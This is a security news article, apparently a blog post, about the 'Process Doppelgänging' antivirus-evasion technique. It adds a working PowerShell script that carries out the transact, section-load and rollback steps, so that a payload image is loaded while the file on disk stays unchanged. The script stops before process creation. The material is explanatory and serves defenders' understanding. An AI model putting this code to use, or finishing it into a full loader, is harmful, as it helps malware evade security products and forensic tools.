Security researchers have discovered a new malware evasion method called “Process Doppelgänging”


Security researchers from the cyber-security firm enSilo have disclosed a new code injection technique called “Process Doppelgänging” that could help malware authors evade most modern antivirus products and forensic tools.

The technique was first presented at Black Hat Europe on December 7, 2017, in the talk “Lost in Transaction: Process Doppelgänging”. The researchers said that it works on all versions of Windows they tested, including Windows 10, and that it bypasses most of the major security products that were current at the time.

According to the researchers:
“Doppelgänging works by utilizing two key distinct features together to mask the loading of a modified executable. By using NTFS transactions, we make changes to an executable file that will never actually be committed to disk. We will then use undocumented implementation details of the process loading mechanism to load our modified executable, but not before rolling back the changes we made to the executable. The result of this procedure is creating a process from the modified executable, while deployed security mechanisms remain in the dark.”

The researchers successfully tested the technique against products from Kaspersky, Bitdefender, ESET, Symantec, McAfee, Windows Defender, AVG, Avast, and Panda. They also state that even advanced forensic tools will not detect it: because the transaction is rolled back before the process starts, any tool that inspects (or hashes) the executable on disk sees only the original, unmodified file, while the process itself runs from a section built from the rolled-back content.

To make this technique work, attackers need to know “a lot of undocumented details on process creation and this is hard.” Unfortunately, the attack “cannot be patched since it exploits fundamental features and the core design of the process loading mechanism in Windows.” One caveat worth noting: the NTFS transaction feature (TxF) that the technique depends on has been deprecated by Microsoft since Windows 8, although it is still present and functional in current Windows releases.
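As an added illustration of the first half of the description quoted above (this is editorial example code, not enSilo's proof of concept, and not a complete Process Doppelgänging implementation), the PowerShell script below uses P/Invoke to open a private copy of notepad.exe inside an NTFS transaction, overwrite it with the bytes of calc.exe as a stand-in payload, create an image section from the transacted handle, roll the transaction back, and then show that the file on disk is unchanged while the section still carries the payload's PE headers. The target path in %TEMP%, the use of notepad.exe and calc.exe, and the class name TxfDemo are assumptions made for the demo; the undocumented process-creation step (turning the section into a running process) is deliberately left out, and the script spawns nothing.

```powershell
# Added demo of the documented half of Process Doppelgaenging (transact -> load section -> roll back).
# Not enSilo's code; it stops before the undocumented process-creation step and spawns nothing.
# Assumptions: Windows with TxF available (deprecated but present), PowerShell 5.1 or 7,
# and a writable %TEMP%. Target/payload paths and the class name TxfDemo are demo choices.

Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class TxfDemo {
    [DllImport("ktmw32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern IntPtr CreateTransaction(IntPtr attrs, IntPtr uow, uint createOpts, uint isoLevel, uint isoFlags, uint timeout, string description);
    [DllImport("ktmw32.dll", SetLastError = true)]
    public static extern bool RollbackTransaction(IntPtr hTransaction);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern IntPtr CreateFileTransactedW(string path, uint access, uint share, IntPtr sa, uint disposition, uint flags, IntPtr template, IntPtr hTransaction, IntPtr miniVersion, IntPtr extended);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool WriteFile(IntPtr hFile, byte[] buf, uint len, out uint written, IntPtr overlapped);
    [DllImport("ntdll.dll")]
    public static extern int NtCreateSection(out IntPtr hSection, uint access, IntPtr objAttrs, IntPtr maxSize, uint pageProtection, uint allocAttrs, IntPtr hFile);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr MapViewOfFile(IntPtr hSection, uint access, uint offHigh, uint offLow, UIntPtr size);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool UnmapViewOfFile(IntPtr addr);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr h);
}
'@

$ErrorActionPreference = 'Stop'
$INVALID_HANDLE = [IntPtr](-1)
$target  = Join-Path $env:TEMP 'doppel-target.exe'          # the file defenders will inspect (demo path)
$payload = Join-Path $env:SystemRoot 'System32\calc.exe'    # stand-in for the attacker-supplied PE
Copy-Item (Join-Path $env:SystemRoot 'System32\notepad.exe') $target -Force
$hashBefore   = (Get-FileHash $target -Algorithm SHA256).Hash
$payloadBytes = [IO.File]::ReadAllBytes($payload)

# 1. Transact: open the target inside a transaction and replace its content with the payload.
$hTx = [TxfDemo]::CreateTransaction([IntPtr]::Zero, [IntPtr]::Zero, 0, 0, 0, 0, $null)
if ($hTx -eq $INVALID_HANDLE) { throw "CreateTransaction failed (Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error()))" }
# GENERIC_READ|GENERIC_WRITE, no sharing, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
$hFile = [TxfDemo]::CreateFileTransactedW($target, [uint32]0xC0000000, 0, [IntPtr]::Zero, 2, [uint32]0x80, [IntPtr]::Zero, $hTx, [IntPtr]::Zero, [IntPtr]::Zero)
if ($hFile -eq $INVALID_HANDLE) { throw "CreateFileTransactedW failed (Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error()))" }
$written = [uint32]0
if (-not [TxfDemo]::WriteFile($hFile, $payloadBytes, [uint32]$payloadBytes.Length, [ref]$written, [IntPtr]::Zero)) { throw 'WriteFile failed' }

# 2. Load: build an image section (SEC_IMAGE) from the transacted handle. The kernel parses the
#    payload PE here; this section is what a real attack would hand to the process-creation step.
$hSection = [IntPtr]::Zero
# SECTION_ALL_ACCESS, PAGE_READONLY, SEC_IMAGE
$status = [TxfDemo]::NtCreateSection([ref]$hSection, [uint32]0x000F001F, [IntPtr]::Zero, [IntPtr]::Zero, 2, [uint32]0x1000000, $hFile)
if ($status -ne 0) { throw ('NtCreateSection failed: 0x{0:X8}' -f $status) }

# 3. Roll back: the transacted write is discarded, so the file on disk never changed.
[void][TxfDemo]::CloseHandle($hFile)
if (-not [TxfDemo]::RollbackTransaction($hTx)) { throw 'RollbackTransaction failed' }
[void][TxfDemo]::CloseHandle($hTx)

# Evidence: the disk hash is unchanged, yet the section still maps the payload's PE headers.
$hashAfter = (Get-FileHash $target -Algorithm SHA256).Hash
$view = [TxfDemo]::MapViewOfFile($hSection, 4, 0, 0, [UIntPtr]::Zero)   # FILE_MAP_READ
if ($view -eq [IntPtr]::Zero) { throw 'MapViewOfFile failed' }
$mapped = New-Object byte[] 512                                           # DOS + PE headers live here
[Runtime.InteropServices.Marshal]::Copy($view, $mapped, 0, 512)
[void][TxfDemo]::UnmapViewOfFile($view)
[void][TxfDemo]::CloseHandle($hSection)

$diskHeader = [byte[]]([IO.File]::ReadAllBytes($target)[0..511])
$mappedB64  = [Convert]::ToBase64String($mapped)
"On-disk file unchanged after rollback : $($hashBefore -eq $hashAfter)"
"Section headers match payload (calc)  : $($mappedB64 -eq [Convert]::ToBase64String([byte[]]$payloadBytes[0..511]))"
"Section headers match disk (notepad)  : $($mappedB64 -eq [Convert]::ToBase64String($diskHeader))"
Remove-Item $target -Force
```

Run it from a normal (non-elevated) PowerShell session; no system file is touched because the target is a private copy. The expected outcome is True, True, False: the on-disk hash is identical before and after, while the section created from the transacted handle contains calc.exe's headers rather than notepad.exe's. That gap is exactly what the quoted description exploits: any scanner that opens the path on disk sees the clean file, so the payload is only visible to something that examines the section or the resulting process's memory. TxF is deprecated, so the transaction calls may fail on a future Windows release with the feature removed.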


Eslam Medhat

Eslam Medhat is a professional pen-tester with over 9 years of IT experience and a strong background in programming languages and application security, ranging from network and system administration to exploit research and development. He has reported vulnerabilities to high-profile companies and vendors and has been acknowledged by them.
